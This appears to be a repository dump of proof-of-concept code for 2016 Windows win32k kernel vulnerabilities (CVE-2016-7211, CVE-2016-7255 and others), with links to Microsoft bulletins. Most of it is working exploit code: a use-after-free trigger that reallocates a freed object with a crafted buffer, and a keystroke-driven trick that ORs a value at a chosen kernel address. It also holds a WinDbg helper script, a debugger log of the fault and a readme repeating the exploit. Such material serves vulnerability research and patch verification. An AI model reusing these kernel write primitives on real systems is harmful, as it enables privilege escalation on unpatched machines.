├── CVE-2016-0048 └── readme.md ├── CVE-2016-0096 ├── poc.js └── readme.md ├── CVE-2016-3252 └── readme.md ├── CVE-2016-7211 ├── poc.c └── readme.md ├── CVE-2016-7255 ├── capture.png ├── hwnd.js ├── log.asm ├── poc.c └── readme.md ├── CVE-2016-7260 └── readme.md └── README.md /CVE-2016-0048/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-018](https://technet.microsoft.com/en-us/library/security/ms16-018.aspx) -------------------------------------------------------------------------------- /CVE-2016-0096/poc.js: -------------------------------------------------------------------------------- 1 | function poc() 2 | { 3 | var hWnd = 0; 4 | var hOtherWnd = 0; 5 | 6 | var HWND_ARRAY = EnumWindows(); 7 | 8 | while(1) 9 | { 10 | hWnd = RandomSelectFromArray(HWND_ARRAY); 11 | if ( 0 == hWnd ) 12 | { 13 | continue; 14 | } 15 | 16 | hOtherWnd = RandomSelectFromArray(HWND_ARRAY); 17 | 18 | SetParent(hWnd , hOtherWnd); 19 | if ( 0 == Random(0 , 1) ) 20 | { 21 | SwitchToThisWindow(hWnd , Random(0 , 1) ); 22 | } 23 | } 24 | 25 | 26 | return 0; 27 | } -------------------------------------------------------------------------------- /CVE-2016-0096/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-034](https://technet.microsoft.com/en-us/library/security/ms16-034.aspx) -------------------------------------------------------------------------------- /CVE-2016-3252/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-090](https://technet.microsoft.com/en-us/library/security/ms16-090.aspx) -------------------------------------------------------------------------------- /CVE-2016-7211/poc.c: -------------------------------------------------------------------------------- 1 | /* 2 | ******************************************************************** 3 | Created: 2016-07-08 14:17:28 4 | Filename: poc.c 5 | Author: root@tinysec.net 6 | ********************************************************************* 7 | */ 8 | #pragma warning(disable:4152) 9 | #pragma warning(disable:4127) 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | 16 | #pragma comment(lib,"ntdll.lib") 17 | 18 | 19 | typedef struct _LARGE_UNICODE_STRING { 20 | ULONG Length; 21 | ULONG MaximumLength : 31; 22 | ULONG bAnsi : 1; 23 | PWSTR Buffer; 24 | } LARGE_UNICODE_STRING, *PLARGE_UNICODE_STRING; 25 | 26 | 27 | 28 | BOOL __stdcall NtGdiMakeObjectXferable(__in HGDIOBJ hObject , __in ULONG nProcessId); 29 | 30 | BOOL __stdcall NtUserLockWindowUpdate(__in HWND hWnd); 31 | 32 | BOOL __stdcall NtUserScrollDC(__in HDC hDC , __in int nX , __in int nY , __in RECT* lprcScroll , __in RECT* lprcClip , __in HRGN hRgnUpdate , __in RECT* lprcUpdate); 33 | 34 | BOOL __stdcall NtUserDefSetText(__in HWND hWnd , __in PVOID plsWindowText); 35 | 36 | 37 | #define SET_ULONG(p,offset,value) (*( (ULONG*)( ((UCHAR*)(p)) + (offset) ) ) = ((ULONG)(value)) ) 38 | 39 | VOID RtlInitLargeUnicodeString( 40 | PLARGE_UNICODE_STRING plstr, 41 | LPCWSTR psz, 42 | UINT cchLimit) 43 | { 44 | plstr->Buffer = (PWSTR)psz; 45 | plstr->bAnsi = FALSE; 46 | 47 | plstr->Length = cchLimit; 48 | plstr->MaximumLength = cchLimit; 49 | } 50 | 51 | 52 | int __cdecl wmain(int nArgc, WCHAR** Argv) 53 | { 54 | HWND hWnd = NULL; 55 | HDC hDC = NULL; 56 | 57 | WNDCLASSEXW wc = {0}; 58 | RECT rc1 = {0}; 59 | 60 | LARGE_UNICODE_STRING lusEvil = {0}; 61 | WCHAR szUserBuffer[ 0x870 ] = {0}; 62 | 63 | ULONG nWantedAddress = 0xdeadbeef; 64 | 65 | 66 | // for win10 67 | wc.cbSize = sizeof(wc); 68 | wc.cbClsExtra = 0; 69 | wc.cbWndExtra = 0x1000; 70 | wc.hbrBackground = NULL; 71 | wc.hCursor = NULL; 72 | wc.hIcon = NULL; 73 | wc.hIconSm = NULL; 74 | wc.hInstance = GetModuleHandleW(NULL); 75 | wc.lpfnWndProc = DefWindowProcW; 76 | wc.lpszClassName = L"CVE-2016-7211"; 77 | wc.lpszMenuName = NULL; 78 | wc.style = CS_CLASSDC; 79 | 80 | RegisterClassExW(&wc); 81 | 82 | hWnd = CreateWindowW( 83 | L"CVE-2016-7211" , 84 | L"CVE-2016-7211", 85 | WS_OVERLAPPEDWINDOW|WS_VISIBLE, 86 | 0, 87 | 0, 88 | 400, 89 | 400, 90 | NULL, 91 | NULL, 92 | GetModuleHandleW(NULL) , 93 | NULL 94 | ); 95 | 96 | hDC = GetWindowDC( hWnd ); 97 | 98 | memset(szUserBuffer , 0xFF , sizeof(szUserBuffer) - sizeof(WCHAR) ); 99 | 100 | SET_ULONG( szUserBuffer , 0x020 , 0xFFFFFFFF ); 101 | 102 | SET_ULONG( szUserBuffer , 0x02a , 0x29D ); 103 | 104 | #ifdef _WIN64 105 | SET_ULONG( szUserBuffer , 0x034 , nWantedAddress - 0x034 ); 106 | #else 107 | SET_ULONG( szUserBuffer , 0x034 , nWantedAddress - 0x034 ); 108 | #endif 109 | 110 | RtlInitLargeUnicodeString(&lusEvil , szUserBuffer , sizeof(szUserBuffer) - sizeof(WCHAR) ); 111 | 112 | NtGdiMakeObjectXferable( hDC , 0 ); 113 | 114 | // free 115 | DestroyWindow(hWnd); 116 | 117 | // re-alloc 118 | NtUserDefSetText( GetDesktopWindow() , &lusEvil ); 119 | 120 | NtUserLockWindowUpdate( GetDesktopWindow() ); 121 | 122 | rc1.left = 354; 123 | rc1.top = 12; 124 | rc1.right = 459; 125 | rc1.bottom = 831; 126 | 127 | // use! 128 | NtUserScrollDC( hDC , 10 , 20 , &rc1 , &rc1 , NULL , &rc1 ); 129 | 130 | return 0; 131 | } 132 | 133 | 134 | 135 | -------------------------------------------------------------------------------- /CVE-2016-7211/readme.md: -------------------------------------------------------------------------------- 1 | [MS16-123](https://technet.microsoft.com/library/security/MS16-123) -------------------------------------------------------------------------------- /CVE-2016-7255/capture.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tinysec/vulnerability/38223d93dff106e27153a1f18605ae4774c4147a/CVE-2016-7255/capture.png -------------------------------------------------------------------------------- /CVE-2016-7255/hwnd.js: -------------------------------------------------------------------------------- 1 | /* 2 | UTF8占位 3 | lib - tagWND.js 4 | 5 | function ( __MODULE__ , exports , require , __FILE__ ) 6 | */ 7 | 8 | // Role Check 9 | var base = require("base"); 10 | if ( !base.FlagOn( base.GetRole() , base.JSRT_WINDBG ) ) 11 | { 12 | base.printf('[-] Not In Windbg Mode!\n'); 13 | return 0; 14 | } 15 | 16 | var win32 = require("windows"); 17 | var windbg = require("windbg"); 18 | 19 | var assert = base.assert; 20 | var isArray = base.isArray; 21 | var isString = base.isString; 22 | var isFunction = base.isFunction; 23 | var isNumber = base.isNumber; 24 | var isObject = base.isObject; 25 | var isNull = base.isNull; 26 | var isNullOrUndefined = base.isNullOrUndefined; 27 | var isUndefined = base.isUndefined; 28 | var isPointer = base.isPointer; 29 | var Pointer = base.Pointer; 30 | var LargeInteger2Pointer = base.LargeInteger2Pointer; 31 | 32 | var isx64 = base.isx64; 33 | var FlagOn = base.FlagOn; 34 | var POINTER_SIZE = base.POINTER_SIZE; 35 | 36 | 37 | var printf = base.printf; 38 | var KdPrint = base.KdPrint; 39 | var sprintf = base.sprintf; 40 | 41 | var setchar = base.setchar; 42 | var setuchar = base.setuchar; 43 | var setushort = base.setushort; 44 | var setint = base.setint; 45 | var setuint = base.setuint; 46 | var setlong = base.setlong; 47 | var setulong = base.setulong; 48 | var setpointer = base.setpointer; 49 | var setstring = base.setstring; 50 | 51 | var getchar = base.getchar; 52 | var getuchar = base.getuchar; 53 | var getushort = base.getushort; 54 | var getint = base.getint; 55 | var getuint = base.getuint; 56 | var getlong = base.getlong; 57 | var getulong = base.getulong; 58 | var getpointer = base.getpointer; 59 | var getstring = base.getstring; 60 | 61 | var cast2Boolean = base.cast2Boolean; 62 | var cast2CHAR = base.cast2CHAR; 63 | var cast2UCHAR = base.cast2UCHAR; 64 | var cast2SHORT = base.cast2SHORT; 65 | var cast2USHORT = base.cast2USHORT; 66 | var cast2INT = base.cast2INT; 67 | var cast2UINT = base.cast2UINT; 68 | var cast2LONG = base.cast2LONG; 69 | var cast2ULONG = base.cast2ULONG; 70 | var cast2Pointer = base.cast2Pointer; 71 | var cast2float = base.cast2float; 72 | var cast2double = base.cast2double; 73 | 74 | // ------------------------------------------------------ 75 | 76 | // win32 77 | 78 | const OS_UNKNOWN = win32.OS_UNKNOWN; 79 | 80 | const OS_XP_SP0 = win32.OS_XP_SP0; // 5.1 81 | const OS_XP_SP1 = win32.OS_XP_SP1; 82 | const OS_XP_SP2 = win32.OS_XP_SP2; 83 | const OS_XP_SP3 = win32.OS_XP_SP3; 84 | 85 | const OS_2003_SP0 = win32.OS_2003_SP0; // 5.2 86 | const OS_2003_SP1 = win32.OS_2003_SP1; 87 | const OS_2003_SP2 = win32.OS_2003_SP2; 88 | 89 | const OS_VISTA_SP0 = win32.OS_VISTA_SP0; // 6.0 90 | const OS_VISTA_SP1 = win32.OS_VISTA_SP1; 91 | const OS_VISTA_SP2 = win32.OS_VISTA_SP2; 92 | 93 | const OS_2008_SP1 = win32.OS_2008_SP1; 94 | const OS_2008_SP2 = win32.OS_2008_SP2; 95 | 96 | const OS_2008_R2_SP0 = win32.OS_2008_R2_SP0; // 6.1 97 | const OS_2008_R2_SP1 = win32.OS_2008_R2_SP1; 98 | 99 | const OS_7_SP0 = win32.OS_7_SP0; 100 | const OS_7_SP1 = win32.OS_7_SP1; 101 | 102 | const OS_2012 = win32.OS_2012; // 6.2 103 | const OS_8 = win32.OS_8; 104 | 105 | const OS_2012_R2 = win32.OS_2012_R2; // 6.3 106 | const OS_8DOT1 = win32.OS_8DOT1; 107 | 108 | const OS_2016 = win32.OS_2016; // 10.0 109 | 110 | const OS_10TH1 = win32.OS_10TH1; 111 | const OS_10TH2 = win32.OS_10TH2; 112 | const OS_10RS1 = win32.OS_10RS1; 113 | 114 | const OS_MAX = win32.OS_MAX; 115 | 116 | //---------------------------------------------------- 117 | // windbg 118 | var ReadVirtualChar = windbg.ReadVirtualChar; 119 | var ReadVirtualUChar = windbg.ReadVirtualUChar; 120 | var ReadVirtualShort = windbg.ReadVirtualShort; 121 | var ReadVirtualUShort = windbg.ReadVirtualUShort; 122 | var ReadVirtualUInt = windbg.ReadVirtualUInt; 123 | var ReadVirtualLong = windbg.ReadVirtualLong; 124 | var ReadVirtualULong = windbg.ReadVirtualULong; 125 | var ReadVirtualPointer = windbg.ReadVirtualPointer; 126 | var ReadVirtualFloat = windbg.ReadVirtualFloat; 127 | var ReadVirtualDouble = windbg.ReadVirtualDouble; 128 | var ReadVirtualStringA = windbg.ReadVirtualStringA; 129 | var ReadVirtualStringW = windbg.ReadVirtualStringW; 130 | 131 | var WriteVirtualChar = windbg.WriteVirtualChar; 132 | var WriteVirtualUChar = windbg.WriteVirtualUChar; 133 | var WriteVirtualShort = windbg.WriteVirtualShort; 134 | var WriteVirtualUShort = windbg.WriteVirtualUShort; 135 | var WriteVirtualInt = windbg.WriteVirtualInt; 136 | var WriteVirtualUInt = windbg.WriteVirtualUInt 137 | var WriteVirtualLong = windbg.WriteVirtualLong; 138 | var WriteVirtualULong = windbg.WriteVirtualULong; 139 | var WriteVirtualPointer = windbg.WriteVirtualPointer; 140 | var WriteVirtualFloat = windbg.WriteVirtualFloat; 141 | var WriteVirtualDouble = windbg.WriteVirtualDouble; 142 | var WriteVirtualStringA = windbg.WriteVirtualStringA; 143 | var WriteVirtualStringW = windbg.WriteVirtualStringW; 144 | 145 | var GetRegChar = windbg.GetRegChar; 146 | var GetRegUChar = windbg.GetRegUChar; 147 | var GetRegShort = windbg.GetRegShort; 148 | var GetRegUShort = windbg.GetRegUShort; 149 | var GetRegInt = windbg.GetRegInt; 150 | var GetRegUInt = windbg.GetRegUInt; 151 | var GetRegLong = windbg.GetRegLong; 152 | var GetRegULong = windbg.GetRegULong; 153 | var GetRegPointer = windbg.GetRegPointer; 154 | var GetRegFloat = windbg.GetRegFloat; 155 | var GetRegDouble = windbg.GetRegDouble; 156 | 157 | var SetRegChar = windbg.SetRegChar; 158 | var SetRegUChar = windbg.SetRegUChar; 159 | var SetRegShort = windbg.SetRegShort; 160 | var SetRegUShort = windbg.SetRegUShort; 161 | var SetRegInt = windbg.SetRegInt; 162 | var SetRegUInt = windbg.SetRegUInt; 163 | var SetRegLong = windbg.SetRegLong; 164 | var SetRegULong = windbg.SetRegULong; 165 | var SetRegPointer = windbg.SetRegPointer; 166 | var SetRegFloat = windbg.SetRegFloat; 167 | var SetRegDouble = windbg.SetRegDouble; 168 | 169 | var GetRegChar = windbg.GetRegChar; 170 | 171 | 172 | var GetSymbolAddress = windbg.GetSymbolAddress; 173 | var GetAddressSymbol = windbg.GetAddressSymbol; 174 | 175 | var GetFieldOffset = windbg.GetFieldOffset; 176 | var CONTAINING_RECORD = windbg.CONTAINING_RECORD; 177 | 178 | var ReloadModule = windbg.ReloadModule; 179 | var GetImageBase = windbg.GetImageBase; 180 | 181 | var ExecuteCommand = windbg.ExecuteCommand; 182 | 183 | var GetSystemVersion = windbg.GetSystemVersion; 184 | var IsPointer64Bit = windbg.IsPointer64Bit; 185 | 186 | var PsGetCurrentThread = windbg.PsGetCurrentThread; 187 | var PsGetCurrentProcess = windbg.PsGetCurrentProcess; 188 | var PsGetThreadWin32Thread = windbg.PsGetThreadWin32Thread; 189 | var PsGetCurrentWin32Thread = windbg.PsGetCurrentWin32Thread; 190 | var GetImplicitProcess = windbg.GetImplicitProcess; 191 | var SetImplicitProcess = windbg.SetImplicitProcess; 192 | var GetImplicitThread = windbg.GetImplicitThread; 193 | var SetImplicitThread = windbg.SetImplicitThread; 194 | 195 | var PsGetActiveProcessList = windbg.PsGetActiveProcessList; 196 | var PsLookupProcessByProcessImageName = windbg.PsLookupProcessByProcessImageName; 197 | 198 | // -------------------------------------------------------------------- 199 | 200 | 201 | 202 | // -------------------------------------------------------------------- 203 | 204 | function HWND2PWND( hWnd ) 205 | { 206 | var gSharedInfo = null; 207 | var gpsi = null; 208 | 209 | var pServerInfo = null; 210 | 211 | var cHandleEntries = 0; 212 | var wIndex = 0; 213 | 214 | var aheList = null; 215 | var HeEntrySize = 0; 216 | 217 | var pHeEntry = null; 218 | var strType = ''; 219 | 220 | var HandleEntry = {}; 221 | 222 | var pWnd = null; 223 | 224 | var hHandle = null; 225 | 226 | 227 | do 228 | { 229 | 230 | 231 | gSharedInfo = GetSymbolAddress('win32kbase!gSharedInfo'); 232 | gpsi = GetSymbolAddress('win32kbase!gpsi'); 233 | 234 | 235 | pServerInfo = ReadVirtualPointer(gpsi , 0x00); 236 | 237 | 238 | cHandleEntries = ReadVirtualLong(pServerInfo , POINTER_SIZE ); 239 | 240 | 241 | aheList = ReadVirtualPointer(gSharedInfo , POINTER_SIZE * 1 ); 242 | HeEntrySize = ReadVirtualLong(gSharedInfo , POINTER_SIZE * 2 ); 243 | 244 | 245 | for ( wIndex = 0; wIndex < cHandleEntries; wIndex++ ) 246 | { 247 | pHeEntry = aheList.add( HeEntrySize * wIndex ); 248 | 249 | HandleEntry = {}; 250 | 251 | HandleEntry.phead = ReadVirtualPointer( pHeEntry , POINTER_SIZE * 0 ); 252 | HandleEntry.pOwner = ReadVirtualPointer( pHeEntry , POINTER_SIZE * 1 ); 253 | HandleEntry.wUniq = ReadVirtualUShort( pHeEntry , POINTER_SIZE * 2 + 0x02 ); 254 | 255 | hHandle = new Pointer( sprintf('0x%04x%04x' , HandleEntry.wUniq , wIndex ) ); 256 | 257 | if ( null != hHandle ) 258 | { 259 | if ( 0 == hHandle.cmp(hWnd) ) 260 | { 261 | pWnd = HandleEntry.phead ; 262 | break; 263 | } 264 | } 265 | } 266 | 267 | }while(false); 268 | 269 | return pWnd; 270 | } 271 | 272 | 273 | function main(argv) 274 | { 275 | var hWnd = null; 276 | var pWnd = null; 277 | 278 | do 279 | { 280 | if ( argv.length <= 1 ) 281 | { 282 | break; 283 | } 284 | 285 | try 286 | { 287 | hWnd = new Pointer( argv[1] ); 288 | } 289 | catch(error) 290 | { 291 | break; 292 | } 293 | 294 | pWnd = HWND2PWND( hWnd ) ; 295 | 296 | printf("[hWnd] 0x%p -> [pWnd] 0x%p \n" , hWnd , pWnd ); 297 | 298 | }while(false); 299 | 300 | return 0; 301 | } 302 | exports.main = main; 303 | 304 | 305 | // -------------------------------------------------------------------- -------------------------------------------------------------------------------- /CVE-2016-7255/log.asm: -------------------------------------------------------------------------------- 1 | 2 | kd> g 3 | hWndChild = 0x000A0402 4 | Break instruction exception - code 80000003 (first chance) 5 | 001b:7557d352 cc int 3 6 | kd> .reload /f win32kbase.sys 7 | kd> .reload /f win32kfull.sys 8 | kd> .reload /f symhelp.sys 9 | kd> .load jswd 10 | kd> !js D:\root\WorkCode\jswd_script\syn\hwnd.js 0x000A0402 11 | [hWnd] 0x000a0402 -> [pWnd] 0x958139c8 12 | 13 | kd> dt win32kfull!tagWND spmenu 0x958139c8 14 | +0x078 spmenu : 0xffffffeb tagMENU 15 | kd> ba r 4 0x958139c8+ 0x078 16 | kd> g 17 | Breakpoint 0 hit 18 | win32kfull!xxxNextWindow+0x253: 19 | 94393f70 85c0 test eax,eax 20 | kd> r 21 | eax=ffffffeb ebx=93ad2c48 ecx=958229f0 edx=0000c035 esi=00000000 edi=958139c8 22 | eip=94393f70 esp=89f4f9a0 ebp=89f4fa08 iopl=0 nv up ei pl nz na po nc 23 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000202 24 | win32kfull!xxxNextWindow+0x253: 25 | 94393f70 85c0 test eax,eax 26 | kd> t 27 | win32kfull!xxxNextWindow+0x255: 28 | 94393f72 7404 je win32kfull!xxxNextWindow+0x25b (94393f78) 29 | kd> t 30 | win32kfull!xxxNextWindow+0x257: 31 | 94393f74 83481404 or dword ptr [eax+14h],4 32 | kd> r 33 | eax=ffffffeb ebx=93ad2c48 ecx=958229f0 edx=0000c035 esi=00000000 edi=958139c8 34 | eip=94393f74 esp=89f4f9a0 ebp=89f4fa08 iopl=0 nv up ei ng nz na pe nc 35 | cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00000286 36 | win32kfull!xxxNextWindow+0x257: 37 | 94393f74 83481404 or dword ptr [eax+14h],4 ds:0023:ffffffff=???????? 38 | -------------------------------------------------------------------------------- /CVE-2016-7255/poc.c: -------------------------------------------------------------------------------- 1 | /* 2 | ******************************************************************** 3 | Created: 2016-11-09 14:23:09 4 | Filename: main.c 5 | Author: root[at]TinySec.net 6 | Version 0.0.0.1 7 | Purpose: poc of cve-2016-7255 8 | ********************************************************************* 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | 16 | 17 | ////////////////////////////////////////////////////////////////////////// 18 | #pragma comment(lib,"ntdll.lib") 19 | #pragma comment(lib,"user32.lib") 20 | 21 | #undef DbgPrint 22 | ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); 23 | ULONG __cdecl DbgPrint(__in char* Format, ...) 24 | { 25 | CHAR* pszDbgBuff = NULL; 26 | va_list VaList=NULL; 27 | ULONG ulRet = 0; 28 | 29 | do 30 | { 31 | pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); 32 | if (NULL == pszDbgBuff) 33 | { 34 | break; 35 | } 36 | RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); 37 | 38 | va_start(VaList,Format); 39 | 40 | _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); 41 | 42 | DbgPrintEx(77 , 0 , pszDbgBuff ); 43 | OutputDebugStringA(pszDbgBuff); 44 | 45 | va_end(VaList); 46 | 47 | } while (FALSE); 48 | 49 | if (NULL != pszDbgBuff) 50 | { 51 | HeapFree( GetProcessHeap(), 0 , pszDbgBuff ); 52 | pszDbgBuff = NULL; 53 | } 54 | 55 | return ulRet; 56 | } 57 | 58 | 59 | int _sim_key_down(WORD wKey) 60 | { 61 | INPUT stInput = {0}; 62 | 63 | do 64 | { 65 | stInput.type = INPUT_KEYBOARD; 66 | stInput.ki.wVk = wKey; 67 | stInput.ki.dwFlags = 0; 68 | 69 | SendInput(1 , &stInput , sizeof(stInput) ); 70 | 71 | } while (FALSE); 72 | 73 | return 0; 74 | } 75 | 76 | int _sim_key_up(WORD wKey) 77 | { 78 | INPUT stInput = {0}; 79 | 80 | do 81 | { 82 | stInput.type = INPUT_KEYBOARD; 83 | stInput.ki.wVk = wKey; 84 | stInput.ki.dwFlags = KEYEVENTF_KEYUP; 85 | 86 | SendInput(1 , &stInput , sizeof(stInput) ); 87 | 88 | } while (FALSE); 89 | 90 | return 0; 91 | } 92 | 93 | int _sim_alt_shift_esc() 94 | { 95 | int i = 0; 96 | 97 | do 98 | { 99 | _sim_key_down( VK_MENU ); 100 | _sim_key_down( VK_SHIFT ); 101 | 102 | 103 | _sim_key_down( VK_ESCAPE); 104 | _sim_key_up( VK_ESCAPE); 105 | 106 | _sim_key_down( VK_ESCAPE); 107 | _sim_key_up( VK_ESCAPE); 108 | 109 | _sim_key_up( VK_MENU ); 110 | _sim_key_up( VK_SHIFT ); 111 | 112 | 113 | } while (FALSE); 114 | 115 | return 0; 116 | } 117 | 118 | 119 | 120 | int _sim_alt_shift_tab(int nCount) 121 | { 122 | int i = 0; 123 | HWND hWnd = NULL; 124 | 125 | 126 | int nFinalRet = -1; 127 | 128 | do 129 | { 130 | _sim_key_down( VK_MENU ); 131 | _sim_key_down( VK_SHIFT ); 132 | 133 | 134 | for ( i = 0; i < nCount ; i++) 135 | { 136 | _sim_key_down( VK_TAB); 137 | _sim_key_up( VK_TAB); 138 | 139 | Sleep(1000); 140 | 141 | } 142 | 143 | 144 | _sim_key_up( VK_MENU ); 145 | _sim_key_up( VK_SHIFT ); 146 | } while (FALSE); 147 | 148 | return nFinalRet; 149 | } 150 | 151 | 152 | 153 | int or_address_value_4(__in void* pAddress) 154 | { 155 | WNDCLASSEXW stWC = {0}; 156 | 157 | HWND hWndParent = NULL; 158 | HWND hWndChild = NULL; 159 | 160 | WCHAR* pszClassName = L"cve-2016-7255"; 161 | WCHAR* pszTitleName = L"cve-2016-7255"; 162 | 163 | void* pId = NULL; 164 | MSG stMsg = {0}; 165 | 166 | do 167 | { 168 | 169 | stWC.cbSize = sizeof(stWC); 170 | stWC.lpfnWndProc = DefWindowProcW; 171 | stWC.lpszClassName = pszClassName; 172 | 173 | if ( 0 == RegisterClassExW(&stWC) ) 174 | { 175 | break; 176 | } 177 | 178 | hWndParent = CreateWindowExW( 179 | 0, 180 | pszClassName, 181 | NULL, 182 | WS_OVERLAPPEDWINDOW|WS_VISIBLE, 183 | 0, 184 | 0, 185 | 360, 186 | 360, 187 | NULL, 188 | NULL, 189 | GetModuleHandleW(NULL), 190 | NULL 191 | ); 192 | 193 | if (NULL == hWndParent) 194 | { 195 | break; 196 | } 197 | 198 | hWndChild = CreateWindowExW( 199 | 0, 200 | pszClassName, 201 | pszTitleName, 202 | WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, 203 | 0, 204 | 0, 205 | 160, 206 | 160, 207 | hWndParent, 208 | NULL, 209 | GetModuleHandleW(NULL), 210 | NULL 211 | ); 212 | 213 | if (NULL == hWndChild) 214 | { 215 | break; 216 | } 217 | 218 | #ifdef _WIN64 219 | pId = ( (UCHAR*)pAddress - 0x28 ); 220 | #else 221 | pId = ( (UCHAR*)pAddress - 0x14); 222 | #endif // #ifdef _WIN64 223 | 224 | SetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId ); 225 | 226 | DbgPrint("hWndChild = 0x%p\n" , hWndChild); 227 | DebugBreak(); 228 | 229 | ShowWindow(hWndParent , SW_SHOWNORMAL); 230 | 231 | SetParent(hWndChild , GetDesktopWindow() ); 232 | 233 | SetForegroundWindow(hWndChild); 234 | 235 | _sim_alt_shift_tab(4); 236 | 237 | SwitchToThisWindow(hWndChild , TRUE); 238 | 239 | _sim_alt_shift_esc(); 240 | 241 | 242 | while( GetMessage(&stMsg , NULL , 0 , 0) ) 243 | { 244 | TranslateMessage(&stMsg); 245 | DispatchMessage(&stMsg); 246 | } 247 | 248 | 249 | } while (FALSE); 250 | 251 | if ( NULL != hWndParent ) 252 | { 253 | DestroyWindow(hWndParent); 254 | hWndParent = NULL; 255 | } 256 | 257 | if ( NULL != hWndChild ) 258 | { 259 | DestroyWindow(hWndChild); 260 | hWndChild = NULL; 261 | } 262 | 263 | UnregisterClassW(pszClassName , GetModuleHandleW(NULL) ); 264 | 265 | return 0; 266 | } 267 | 268 | int __cdecl wmain(int nArgc, WCHAR** Argv) 269 | { 270 | do 271 | { 272 | or_address_value_4( (void*)0xFFFFFFFF ); 273 | } while (FALSE); 274 | 275 | return 0; 276 | } 277 | 278 | 279 | -------------------------------------------------------------------------------- /CVE-2016-7255/readme.md: -------------------------------------------------------------------------------- 1 | # poc for CVE-2016-7255 2 | 3 | 4 | 5 | ```c 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | 13 | #pragma comment(lib,"ntdll.lib") 14 | #pragma comment(lib,"user32.lib") 15 | 16 | #undef DbgPrint 17 | ULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... ); 18 | ULONG __cdecl DbgPrint(__in char* Format, ...) 19 | { 20 | CHAR* pszDbgBuff = NULL; 21 | va_list VaList=NULL; 22 | ULONG ulRet = 0; 23 | 24 | do 25 | { 26 | pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR)); 27 | if (NULL == pszDbgBuff) 28 | { 29 | break; 30 | } 31 | RtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR)); 32 | 33 | va_start(VaList,Format); 34 | 35 | _vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList); 36 | 37 | DbgPrintEx(77 , 0 , pszDbgBuff ); 38 | OutputDebugStringA(pszDbgBuff); 39 | 40 | va_end(VaList); 41 | 42 | } while (FALSE); 43 | 44 | if (NULL != pszDbgBuff) 45 | { 46 | HeapFree( GetProcessHeap(), 0 , pszDbgBuff ); 47 | pszDbgBuff = NULL; 48 | } 49 | 50 | return ulRet; 51 | } 52 | 53 | 54 | int _sim_key_down(WORD wKey) 55 | { 56 | INPUT stInput = {0}; 57 | 58 | do 59 | { 60 | stInput.type = INPUT_KEYBOARD; 61 | stInput.ki.wVk = wKey; 62 | stInput.ki.dwFlags = 0; 63 | 64 | SendInput(1 , &stInput , sizeof(stInput) ); 65 | 66 | } while (FALSE); 67 | 68 | return 0; 69 | } 70 | 71 | int _sim_key_up(WORD wKey) 72 | { 73 | INPUT stInput = {0}; 74 | 75 | do 76 | { 77 | stInput.type = INPUT_KEYBOARD; 78 | stInput.ki.wVk = wKey; 79 | stInput.ki.dwFlags = KEYEVENTF_KEYUP; 80 | 81 | SendInput(1 , &stInput , sizeof(stInput) ); 82 | 83 | } while (FALSE); 84 | 85 | return 0; 86 | } 87 | 88 | int _sim_alt_shift_esc() 89 | { 90 | int i = 0; 91 | 92 | do 93 | { 94 | _sim_key_down( VK_MENU ); 95 | _sim_key_down( VK_SHIFT ); 96 | 97 | 98 | _sim_key_down( VK_ESCAPE); 99 | _sim_key_up( VK_ESCAPE); 100 | 101 | _sim_key_down( VK_ESCAPE); 102 | _sim_key_up( VK_ESCAPE); 103 | 104 | _sim_key_up( VK_MENU ); 105 | _sim_key_up( VK_SHIFT ); 106 | 107 | 108 | } while (FALSE); 109 | 110 | return 0; 111 | } 112 | 113 | 114 | 115 | int _sim_alt_shift_tab(int nCount) 116 | { 117 | int i = 0; 118 | HWND hWnd = NULL; 119 | 120 | 121 | int nFinalRet = -1; 122 | 123 | do 124 | { 125 | _sim_key_down( VK_MENU ); 126 | _sim_key_down( VK_SHIFT ); 127 | 128 | 129 | for ( i = 0; i < nCount ; i++) 130 | { 131 | _sim_key_down( VK_TAB); 132 | _sim_key_up( VK_TAB); 133 | 134 | Sleep(1000); 135 | 136 | } 137 | 138 | 139 | _sim_key_up( VK_MENU ); 140 | _sim_key_up( VK_SHIFT ); 141 | } while (FALSE); 142 | 143 | return nFinalRet; 144 | } 145 | 146 | 147 | 148 | int or_address_value_4(__in void* pAddress) 149 | { 150 | WNDCLASSEXW stWC = {0}; 151 | 152 | HWND hWndParent = NULL; 153 | HWND hWndChild = NULL; 154 | 155 | WCHAR* pszClassName = L"cve-2016-7255"; 156 | WCHAR* pszTitleName = L"cve-2016-7255"; 157 | 158 | void* pId = NULL; 159 | MSG stMsg = {0}; 160 | 161 | do 162 | { 163 | 164 | stWC.cbSize = sizeof(stWC); 165 | stWC.lpfnWndProc = DefWindowProcW; 166 | stWC.lpszClassName = pszClassName; 167 | 168 | if ( 0 == RegisterClassExW(&stWC) ) 169 | { 170 | break; 171 | } 172 | 173 | hWndParent = CreateWindowExW( 174 | 0, 175 | pszClassName, 176 | NULL, 177 | WS_OVERLAPPEDWINDOW|WS_VISIBLE, 178 | 0, 179 | 0, 180 | 360, 181 | 360, 182 | NULL, 183 | NULL, 184 | GetModuleHandleW(NULL), 185 | NULL 186 | ); 187 | 188 | if (NULL == hWndParent) 189 | { 190 | break; 191 | } 192 | 193 | hWndChild = CreateWindowExW( 194 | 0, 195 | pszClassName, 196 | pszTitleName, 197 | WS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD, 198 | 0, 199 | 0, 200 | 160, 201 | 160, 202 | hWndParent, 203 | NULL, 204 | GetModuleHandleW(NULL), 205 | NULL 206 | ); 207 | 208 